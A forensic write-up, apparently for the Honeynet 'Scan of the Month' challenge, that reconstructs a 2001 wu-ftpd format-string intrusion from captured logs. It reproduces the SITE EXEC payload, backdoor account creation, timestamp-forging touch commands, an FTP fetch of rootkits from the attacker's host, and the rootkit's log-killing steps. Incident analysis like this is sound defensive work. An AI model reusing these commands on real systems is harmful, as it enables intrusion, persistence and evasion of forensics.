Introduction
This is the analysis of Scan of the month -October.
Essential tools used are
- Redhat 7.1 machine
- Ethereal 0.8.19
- Perl 5.6.0
All time information given here is GMT+8.
Answers to Challenge
* Which vulnerability did the intruder exploit?
The hacker exploited a vulnerability in wu-ftpd. It is described
below:
Name:
CVE-2000-0573
Description The reply function in wu-ftpd 2.6.0 and earlier does not
properly cleanse an untrusted format string, which allows remote attackers
to execute arbitrary commands via the SITE EXEC command.
This is determined from 2 factors
- The FTP server version is "wu-2.6.0(1)"
- The many SITE EXEC attempts which resulted in root shell.
The decode of the start of attack is shown below:
220 ns1 FTP server (Version
wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
USER ftp
331 Guest login ok, send
your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access
restrictions apply.
SITE EXEC %020d|%.f%.f|
200-00000000000000000049|0-2|
200 (end of '%020d|%.f%.f|')
SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|
Intruder used source IP address 207.35.251.172 for exploit.
* What ways, and in what order, did the intruder
use to connect and run commands on the system?
This can be determined in 2 ways, using the snort log and the syslog
to cross check.
1] At 2001-09-17 07:52:51
Inruder telnet from IP address 217.156.93.166. Tried to login as userid:nobody
password:ultravirus. Tried to login again as userid:nobody password:virus.
Finally tried to login as userid:uucp but connection finally timed
out.
2] At 2001-09-17 07:55:45
Intruder ftp from IP address 207.35.251.172 which resulted in the intruder
exploiting the wu-ftpd vulnerability to own the system.
After owning the system, the following commands were issued through
FTP
id;
w
dir
cd /usr
ls
cd local
dir
cd bin
dir
cd etc
ls --color
cd ..
cd etc
ls--color
ls
dir
pwd
cd ..
cd doc
dir
cd /tmp
dir
cd /
dir
cd dev
dir
dir
cd /etc/X11/applnk
ls
cd internet
cd Internet
ls
pwd
passwd nobody -d
08:13:27 Upon changing the password of "nobody", the intruder telnet
into the system
using userid:nobody to verify that access is available. After executing
"w"
to check, the intruder logged out.
The intruder continued with current FTP connection and issue the following
commands:
cd /
mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc/passwd
/etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc /etc/X11/applnk/Internet/.etc
passwd nobody -d
/usr/sbin/adduser dns -d/bin
-u 0 -g 0 -s/bin/bash
passwd dns -d
touch -acmr /etc/X11/applnk/Internet/.etcpasswd
/etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc
/etc
ls
ls -d
ls -s
ls -a
ls -n
ls -lt
cd etc
ls -lt
cat passwd-
08:32:10 Intruder telnet into the system again using "nobody", then
issued the following commands:
su dns
w
cd /tmp
mc -s
cd /dev/rd
ftp teleport.go.ro
[after which exited]
mkdir sdc0
cd sdc0
ls
ftp teleport.go.ro
08:41:34 During the ftp session to teleport.go.ro,
the following commands were used:
USER teleport
PASS gunoierul
SYST
CWD new
TYPE I
PORT 192,168,1,102,4,2
RETR Zer0.tar.gz
PORT 192,168,1,102,4,3
RETR copy.tar.gz
PORT 192,168,1,102,4,4
RETR ooty.tar.gz
QUIT
08:43:05 After retrieving the root kits, the intruder continues with:
tar zxvf Zer0.tar.gz
cd Zer0/
ls
./Go 24
During the execution of "Go", the intruder attempted what seem like
port scans.
08:51:58 The intruder continue with the following commands in a SSH
session (the following is based on the syslog information)
w
whoami
cd /dev/rd/sdc0
ls
rm Zer0.tar.gz
ls
alias ls='ls --color'
ls
ls
passwd nobody
ping www.yahoo.com
pico /etc/rc.d/rc3.d/S50inet
ls
mv copy.tar.gz /usr/X11R6/bin/.,/copy/
cd /usr/X11R6/bin/.,/copy/
mv copy.tar.gz ../
ls
cd ..
tar zxvf copy tar.gz
chmod 7777 *
ls
rm copy.tar.gz
cd copy
chmod 7777 *
ls
* How did the intruder try to hide his edits from the MAC times?
The commands used to hide his edits from the MAC times as described
previously are (comments in Blue italic):
First create objects for storing MAC time
mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/applnk/Internet/.etcpasswd
Use the touch command to transfer the original MAC time to the new object
touch -acmr /etc/passwd
/etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc /etc/X11/applnk/Internet/.etc
The
intruder does his stuff
passwd nobody -d
/usr/sbin/adduser dns -d/bin
-u 0 -g 0 -s/bin/bash
passwd dns -d
Finally
use the touch command to restore the original MAC time
touch -acmr /etc/X11/applnk/Internet/.etcpasswd
/etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc
/etc
* The intruder downloaded rootkits, what were
they called? Are they new/custom rootkits?
The 3 rootkits downloaded are Zer0, copy and ooty.
The package listing are shown below:
tar tvfz zero.tar.gz
drwxrwxr-x george/george 0 2001-09-14 08:00:54
Zer0/
-rwxr-xr-x george/george 9458 2001-09-17 08:26:34 Zer0/Go
-rw-r--r-- george/george 100569 2001-09-10 04:38:11 Zer0/ssh.tgz
-rw-rw-r-- george/george 11364 2001-09-10 17:01:02 Zer0/tls.tgz
-rw-r--r-- george/george 11970 2001-09-13 07:10:57 Zer0/adr.tgz
-rw-r--r-- george/george 11723 2001-09-10 04:43:17 Zer0/adr2.tgz
-rw-r--r-- george/george 2333 2001-09-17 08:27:45 Zer0/adore.h
tar tvfz copy.tar.gz
drwxr-xr-x virus/virus 0 2001-08-20
20:35:32 copy/
-rwxrwxrwx virus/virus 8268 2001-03-25 04:31:07 copy/mj2
-rwxrwxr-x virus/virus 8268 2001-05-29 01:40:00 copy/mj3
-rwxr-xr-x virus/virus 652030 1999-09-09 20:50:09 copy/ssh
drwxrwxr-x virus/virus 0 2001-09-05
21:05:39 copy/smrf/
-rwxr-xr-x virus/virus 22846 2001-06-16 20:44:00 copy/smrf/smrf5
-rw-r--r-- virus/virus 1470 2001-09-05 21:04:04 copy/smrf/smurf.ips
-rwxrwxr-- virus/virus 128 2001-08-18 15:37:28
copy/root_them
-rwxrwxr-- virus/virus 12166 2001-06-22 01:25:00 copy/process_list
-rwxrwxrwx virus/virus 12847 2001-02-16 20:07:00 copy/generate
-rwxrwxr-x virus/virus 27682 2001-08-18 15:38:43 copy/suu.tgz
-rwxrwxr-x virus/virus 14365 2001-08-14 10:34:56 copy/genmass
-rwxr-xr-x virus/virus 100158 2001-06-22 09:19:00 copy/zxploit
-rwxrwxrwx virus/virus 15121 2001-01-19 21:09:21 copy/wu-scan
tar tvfz ooty.tar.gz
drwxrwxr-x virus/virus 0 2001-09-04
11:06:12 ooty/
-rw-rw-r-- virus/virus 438 2001-06-28 13:16:50
ooty/CrOn
-rw-r--r-- virus/virus 6100 2001-05-30 08:14:17 ooty/motd
-rwxrwxr-x virus/virus 11894 2001-06-28 13:18:21 ooty/sush
-rwxr-xr-x virus/virus 460 2001-05-30 08:14:17
ooty/bindpar.x
-rw-rw-r-- virus/virus 81 2001-06-28
13:18:19 ooty/bighole.c
-rwxr-xr-x virus/virus 58 2001-06-28
13:18:19 ooty/flare
crw--w---- virus/tty 136,2 2001-09-04 11:06:44
ooty/none ~!bighole
-rwxr-xr-x virus/virus 13548 2001-05-30 08:14:17 ooty/crontab.x
-rwxr-xr-x virus/virus 1791 2001-05-30 08:14:17 ooty/mail.x
-rwxr-xr-x virus/virus 2141 2001-05-30 08:14:17 ooty/perl.x
-rwxr-xr-x virus/virus 1332 2001-05-30 08:14:17 ooty/prlnx.sh
-rwxrwxr-x virus/virus 12025 2001-06-28 13:18:20 ooty/bighole
-rwxr-xr-x virus/virus 14428 2001-05-30 08:14:17 ooty/kernel.x
From the evidence of the package contents alone, there are certain
amount
of customisation as some of the files are rather recently created.
The adore rootkit is a rather well known one.
* Recover (tell how you did it too) the rootkits
from the snort binary capture
By using Ethereal, load the snort capture.
For each FTP transfer, choose any FTP-DATA packet you want and click
'Follow TCP stream'.
Then save the TCP stream in Hex dump format to a file.
vi the file and do ':%s/^........//' to do a global substitution to
remove the first 8 characters of counters.
Pipe the file to a perl script converter that saves as a binary file
(Eg. 'cat filename | ./convert.pl').
The perl script converter convert.pl is shown below:
#!/usr/bin/perl
open (output, ">rk.tar.gz");
while (<>)
{
$_=~s/\W//g;
print output pack("H*",$_);
}
close(output);
In this case the output file 'rk.tar.gz' is the rootkit.
* What does the rootkit do to hide the presence
of the attacker on the system?
By analysing the "Go" script, it does the following to hide the intruder
1] kill the syslogd daemon
2] checks for remote logging of syslog and warn the attacker
3] Installs the 'adore' LKM rootkit that basically does all the hiding.
4] It also uses the 'touch' command as described previously.
* What did you learn from this exercise?
It is interesting to note that the intruder attacks from 2 different
IP addresses.
Also by doing 'strings' on the zxploit program in the 'copy' rootkit,
it is a SITE EXEC exploit using the "mozilla@" FTP password . Hence, most
likely the intruder used the zxploit program to hack into this system.
* How long did this challenge take you?
About 1 hour to determine the exploit used.
About 3 hours to check for tools, but in the end wrote my own script
to extract the rootkits.
About 3 hours to trace the sequence of events.
Bonus Questions:
Based on this challenge, write an example letter of notification to
the source owner that attacked the system. Include any evidence or
logs that you feel important.
There are two systems that were used to attack. The source owners are
determined by using whois as shown below:
whois "217.156.93.166"@whois.ripe.net
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum: 217.156.93.0 - 217.156.93.255
netname: MIDO-IMPEX
descr: S.C. MIDO IMPEX S.R.L.
descr: 9 C 5 MARASESTI STREET,
5500, BACAU, ROMANIA
country: RO
admin-c: RD5445-RIPE
tech-c: RD5445-RIPE
status: ASSIGNED PA
mnt-by: AS3233-MNT
notify: domain-admin@listserv.rnc.ro
changed: cristih@rnc.ro 20010515
source: RIPE
person: ROMULUS DOGARU
address: 9 C 5 MARASESTI ST
address: 5500, BACAU
address: ROMANIA
phone: +40-34-171060
fax-no: +40-34-171080
e-mail: romi@mido.ro
nic-hdl: RD5445-RIPE
notify: domain-admin@listserv.rnc.ro
mnt-by: AS3233-MNT
changed: cristih@rnc.ro 20001124
source: RIPE
whois "207.35.251.172"@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA) GRICS01
207.35.0.0 - 207.35.255.255
B-Line Technical Services (NETBLK-B-LINE-CA) B-LINE-CA
207.35.251.160 - 207.35.251.191
whois GRICS01@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA)
265 de la Couronne
Quebec City, Quebec J2S 1H9
CA
Netname: GRICS01
Netblock: 207.35.0.0 - 207.35.255.255
Maintainer: LINX
Coordinator:
Daoust, Philippe (PD135-ARIN)
noc@in.bell.ca
1-800-450-7771 +1 (416) 215-5423
Domain System inverse mapping provided by:
NS1.BELLGLOBAL.COM
198.235.216.1
NS2.BELLGLOBAL.COM
198.235.216.2
ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
Record last updated on 26-May-2000.
Database last updated on 2-Oct-2001 23:19:58 EDT.
The following is a sample notification letter -
Dear owner,
recently our machine was compromised and after analysis of our logs,
we have clear and persistence evidence that
your machine was used to gain unauthorised entry to our machine. If you
require the help of your local authorities
to followup, please disconnect your machine from the network immediately.
Attached is a partial packet capture of the intrusion:
(Time given is 2001-09-17 GMT+8)
217.156.93.166
207.35.251.172